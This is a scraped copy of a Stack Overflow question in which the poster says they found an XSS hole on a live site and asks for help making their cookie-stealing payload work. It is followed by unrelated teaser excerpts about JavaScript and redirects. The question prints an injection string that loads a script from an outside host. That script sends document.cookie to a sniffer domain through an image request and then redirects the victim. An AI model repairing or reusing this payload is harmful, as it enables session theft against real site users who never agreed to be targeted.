Xss redirect and cookies

Posted by user1824906 on Stack Overflow See other posts from Stack Overflow or by user1824906
Published on 2012-11-21T22:56:28Z Indexed on 2012/11/21 22:59 UTC
Read the original article Hit count: 285

Filed under:

JavaScript

|

redirect

|

cookies

|

xss

I found Active XSS on one site. I need to steal cookies and after it to make redirect on other site. This site has a non-frame protection I tried to put "><script src='http://site.ru/1.js' /></script>"

http://site.ru/1.js contains:

img = new Image(); img.src = "http:/sniffer.com/nasdasdnu.gif?"+document.cookie;
    var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
    var speed = 100;
    function reload() {
    document.location = URL
    }
    setTimeout("reload()", speed);

But it doesn't work=\ Any help?

© Stack Overflow or respective owner

Related posts about JavaScript

CHAT ROOMs 7 by 6

as seen on Stack Overflow - Search for 'Stack Overflow'
I am looking for chatroom on one page with 7 loggedin users and 6+rows for say 42 users.these users will keep on adding wthnew users.Need urgent help.A PRETTY UNUSUAL Q FOR MOST OF U.What is MORE REQ new features: Usernames are unique to users currently chatting You can see a "currently chatting"… >>> More
Integrating JavaScript Unit Tests with Visual Studio

as seen on Stephen Walter - Search for 'Stephen Walter'
Modern ASP.NET web applications take full advantage of client-side JavaScript to provide better interactivity and responsiveness. If you are building an ASP.NET application in the right way, you quickly end up with lots and lots of JavaScript code. When writing server code, you should be writing… >>> More
Has Javascript developed beyond what it was originally designed to do?

as seen on Programmers - Search for 'Programmers'
I've been talking with a friend about the purpose of Javascript, when and how it should be used, etc. He quoted that: JavaScript was designed to add interactivity to HTML pages [...] JavaScript gives HTML designers a programming tool HTML authors are normally not programmers… >>> More
PHP, javascript, single quote problems with IE when passing variable from ajax post to javascript fu

as seen on Stack Overflow - Search for 'Stack Overflow'
Hi! I have been trying to get this to work for a while, and I suspect there's an easy solution that I just can't find. My head feels like jelly and I would really appreciate any help. My main page.php makes a .post() to backend.php and fetches a list of cities which it echoes in the form of: <li… >>> More
Javascript in XSL that is loaded by Javascript

as seen on Stack Overflow - Search for 'Stack Overflow'
Is there anyway to have javascript run when a XSL sheet has been applied to an XML file by Javascript? I am using a JQuery plugin to apply the sheet to the xml but the javascript that is located inside of the XSL file will not run. I put the Javascript at the bottom of the file and it still does… >>> More

Related posts about redirect

ajax redirect dillema, how to get redirect URL OR how to set properties for redirect request

as seen on Stack Overflow - Search for 'Stack Overflow'
First, I'm working in Google Chrome, if that helps. Here is the behavior: I send an xhr request via jquery to a remote site (this is a chrome Extension, and I've set all of the cross-site settings...): $.ajax({ type: "POST", contentType : "text/xml", url: some_url, data: some_xml… >>> More
.htaccess file size causes 500 Internal Server Error

as seen on Pro Webmasters - Search for 'Pro Webmasters'
As soon as my .htaccess goes over approx 8410 bytes, I get a 500 Internal Server Error. I don't think this is due to a bad redirect, as I have experimented with redirects in the .htaccess and then with just text that is commented out #. (no actual commands in the .htaccess file) Is there anything… >>> More
ASP.Net FormsAuthentication Redirect Loses the cookie between Redirect and Application_AuthenticateR

as seen on Stack Overflow - Search for 'Stack Overflow'
I have a FormsAuthentication cookie that is persistent and works independently in a development, test, and production environment. I have a user that can authenticate, the user object is created, the authentication cookie is added to the response: 'Custom object to grab the TLD from the url authCookie… >>> More
How to avoid open-redirect vulnerability and safely redirect on successful login (HINT: ASP.NET MVC

as seen on Stack Overflow - Search for 'Stack Overflow'
Normally, when a site requires that you are logged in before you can access a certain page, you are taken to the login screen and after successfully authenticating yourself, you are redirected back to the originally requested page. This is great for usability - but without careful scrutiny, this feature… >>> More
Redirect with htaccess for images onto another server without redirect looping

as seen on Stack Overflow - Search for 'Stack Overflow'
Hey guys, I currently have a host where my main site is hosted on. I have set up nginx on another server to mirror/cache files being requested if it doesn't have it already, in particular images and flv videos. For example: www.domain.com is my main site. www.domain.com/video/video.flv www.domain… >>> More